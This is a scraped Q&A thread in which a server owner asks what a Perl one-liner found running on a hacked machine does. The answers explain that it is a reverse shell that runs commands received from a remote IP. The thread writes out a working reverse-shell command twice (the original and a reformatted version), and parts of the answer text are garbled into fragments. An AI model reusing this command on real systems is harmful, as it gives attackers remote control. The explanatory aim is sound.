What does this vile program do?

My server is hacked and ps auxshows that it is running this program now:

perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET (PeerAddr,"169.50.9.58:1212");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;

I don't know Perl ... what does this program do?

+4
source share
3 answers

It opens a socket for this IP address. He then sets STDINto read from it and STDOUTto go to it. Thus, it creates a direct communication channel between the process and this IP address.

Then it goes into a cycle whilein which it starts through system, everything that comes through STDIN.

, "--" (), . , , , IP- .

+10

:

system$_ while<>;

" , , ".

nc -l -p 1212 , script , , , .

+2

Perl

, ;

use IO;

$p = fork;
exit, if ( $p );

$c = IO::Socket::INET->new( PeerAddr => "169.50.9.58:1212" );
STDIN->fdopen( $c, 'r' );
$~->fdopen( $c, 'w' );
system $_ while <>;

whois.com IP-. "".

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '169.50.9.32 - 169.50.9.63'

% Abuse contact for '169.50.9.32 - 169.50.9.63' is 'email@softlayer.com'

inetnum:        169.50.9.32 - 169.50.9.63
netname:        NETBLK-SOFTLAYER-RIPE-CUST-JS17702-RIPE
descr:          VidScale, Inc
country:        US
admin-c:        JS17702-RIPE
tech-c:         JS17702-RIPE
status:         LEGACY
mnt-by:         MAINT-SOFTLAYER-RIPE
created:        2016-01-09T01:24:25Z
last-modified:  2016-01-09T01:24:25Z
source:         RIPE

person:         John Scharber
address:        4406 Whistling Wind Way
address:        Placerville, CA 95667 US
phone:          +1.866.398.7638
nic-hdl:        JS17702-RIPE
abuse-mailbox:  email@vidscale.com
mnt-by:         MAINT-SOFTLAYER-RIPE
created:        2016-01-09T01:24:23Z
last-modified:  2016-01-09T01:24:23Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.88.1 (BLAARKOP)
+2

Source: https://habr.com/ru/post/1677382/


All Articles